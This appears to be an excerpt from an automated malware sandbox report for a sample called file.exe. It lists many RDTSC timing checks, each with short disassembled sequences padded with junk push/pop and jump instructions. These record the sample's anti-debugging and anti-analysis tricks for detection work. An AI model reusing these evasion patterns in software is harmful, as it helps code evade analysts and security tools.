    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6756E second address: D6758C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jg 00007F23E44F3786h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F23E44F3786h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6758C second address: D6759E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F23E4515396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F23E4515396h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69A2E second address: D69A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69A32 second address: D69A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F160 second address: D6F166 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F166 second address: D6F16D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F6D9 second address: D6F6F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F3793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F9CC second address: D6F9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F9D3 second address: D6F9DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F9DB second address: D6F9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F9DF second address: D6F9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E44F378Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F9F9 second address: D6FA1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E45153A8h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70302 second address: D70331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F3794h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F23E44F3797h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70BB0 second address: D70BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70BB4 second address: D70BBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70BBA second address: D70BE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E451539Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F23E45153A5h 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F23E4515396h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70BE9 second address: D70BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70BED second address: D70BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F23E4515396h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70BFB second address: D70C14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F378Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79380 second address: D79386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D83EFE second address: D83F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F23E44F3795h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D83F20 second address: D83F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84098 second address: D840A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F378Bh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84389 second address: D8438D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84540 second address: D84552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F378Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84552 second address: D8455E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F23E4515396h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8455E second address: D84562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84562 second address: D845CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E45153A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F23E45153A3h 0x00000014 pushad 0x00000015 jmp 00007F23E45153A9h 0x0000001a jmp 00007F23E45153A8h 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8471B second address: D84735 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F23E44F3786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F23E44F378Ch 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84735 second address: D8473D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8473D second address: D84745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84745 second address: D84749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D849DF second address: D84A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F23E44F378Ch 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F23E44F378Eh 0x00000014 jmp 00007F23E44F378Bh 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84C86 second address: D84CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E45153A6h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84CA0 second address: D84CCC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F23E44F3786h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F23E44F3797h 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84DE2 second address: D84DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F23E4515396h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85543 second address: D85567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007F23E44F37A3h 0x0000000b jmp 00007F23E44F3797h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85567 second address: D8556B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85CFC second address: D85D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85D05 second address: D85D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E451539Bh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85D14 second address: D85D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85D18 second address: D85D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E45153A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jbe 00007F23E4515396h 0x00000015 ja 00007F23E4515396h 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F23E451539Dh 0x00000026 pushad 0x00000027 popad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85D5F second address: D85D7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jp 00007F23E44F3786h 0x0000000b jmp 00007F23E44F3790h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85D7C second address: D85D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D83A81 second address: D83A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B4EF second address: D8B4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B4F3 second address: D8B4FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B4FD second address: D8B501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B7C9 second address: D8B7DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F23E44F3786h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B7DD second address: D8B7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F4C6 second address: D8F4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F23E44F378Eh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F389 second address: D8F3A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E45153A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F3A3 second address: D8F3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E44F378Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F3B5 second address: D8F3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BDDC second address: D9BDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BDE2 second address: D9BDE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BDE6 second address: D9BE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E44F378Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 pushad 0x00000012 je 00007F23E44F3786h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC16F second address: DAC175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC175 second address: DAC179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAFA6C second address: DAFA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF908 second address: DAF91D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F378Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF91D second address: DAF92C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E451539Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB70BE second address: DB70CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F378Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB70CE second address: DB70DA instructions: 0x00000000 rdtsc 0x00000002 js 00007F23E451539Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB70DA second address: DB70E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB70E2 second address: DB70EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F23E4515396h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB70EC second address: DB70F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7234 second address: DB723C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB723C second address: DB7247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F23E44F3786h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7762 second address: DB7766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7766 second address: DB777D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F3793h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB777D second address: DB7786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB78D3 second address: DB78D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB78D9 second address: DB7902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E45153A1h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F23E451539Bh 0x00000010 jnp 00007F23E4515396h 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB844C second address: DB8468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E44F3793h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB8468 second address: DB847B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E451539Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC1EF second address: DBC223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E44F3791h 0x00000009 jbe 00007F23E44F3786h 0x0000000f popad 0x00000010 jmp 00007F23E44F3798h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5E7F second address: DC5E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E45153A6h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5D20 second address: DC5D3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F23E44F3797h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5D3E second address: DC5D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8827 second address: DD8866 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F23E44F3786h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F23E44F378Ch 0x00000012 pushad 0x00000013 jmp 00007F23E44F378Dh 0x00000018 jmp 00007F23E44F3791h 0x0000001d jnl 00007F23E44F3786h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4213 second address: DF421B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF421B second address: DF422D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007F23E44F3786h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF307C second address: DF3082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF334E second address: DF3352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3611 second address: DF361B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F23E4515396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3A00 second address: DF3A0A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F23E44F3786h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3EAE second address: DF3ECC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F23E45153A2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3ECC second address: DF3ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3ED0 second address: DF3ED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6C6B second address: DF6C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6DF1 second address: DF6DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF710F second address: DF7143 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F378Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edx, 7D4354F1h 0x00000012 mov dword ptr [ebp+1247374Ch], ebx 0x00000018 push dword ptr [ebp+122D2C92h] 0x0000001e clc 0x0000001f push 1EB3CBC8h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7143 second address: DF7147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7147 second address: DF714D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF714D second address: DF7166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F23E45153A5h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF83CD second address: DF83D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF83D1 second address: DF83D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF83D7 second address: DF83DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBADF second address: DFBAF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E45153A3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0DB2 second address: 50E0DC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F378Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
